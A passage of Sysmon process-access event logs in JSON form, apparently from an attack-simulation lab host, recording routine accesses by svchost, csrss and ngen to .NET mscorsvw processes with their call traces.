C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:18.278","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-133E-5F25-0000-0010A0230D00}","TargetProcessId":"4748","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7923,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:18.309\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1325-5F25-0000-0010024C0B00}\r\nTargetProcessId: 5032\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:18.309","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1325-5F25-0000-0010024C0B00}","TargetProcessId":"5032","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7924,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:18.309\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1325-5F25-0000-0010024C0B00}\r\nTargetProcessId: 5032\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:18.309","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1325-5F25-0000-0010024C0B00}","TargetProcessId":"5032","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7925,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:18.309\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1325-5F25-0000-0010024C0B00}\r\nTargetProcessId: 5032\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:18.309","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1325-5F25-0000-0010024C0B00}","TargetProcessId":"5032","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7926,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:18.341\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-133E-5F25-0000-0010A42A0D00}\r\nTargetProcessId: 3216\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:18.341","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-133E-5F25-0000-0010A42A0D00}","TargetProcessId":"3216","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7927,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:18.341\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-133E-5F25-0000-0010A42A0D00}\r\nTargetProcessId: 3216\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:18.341","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-133E-5F25-0000-0010A42A0D00}","TargetProcessId":"3216","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7928,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:18.356\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-133E-5F25-0000-0010A42A0D00}\r\nTargetProcessId: 3216\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:18.356","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-133E-5F25-0000-0010A42A0D00}","TargetProcessId":"3216","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7929,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:18.388\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1330-5F25-0000-001098A90B00}\r\nTargetProcessId: 5008\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:18.388","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1330-5F25-0000-001098A90B00}","TargetProcessId":"5008","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64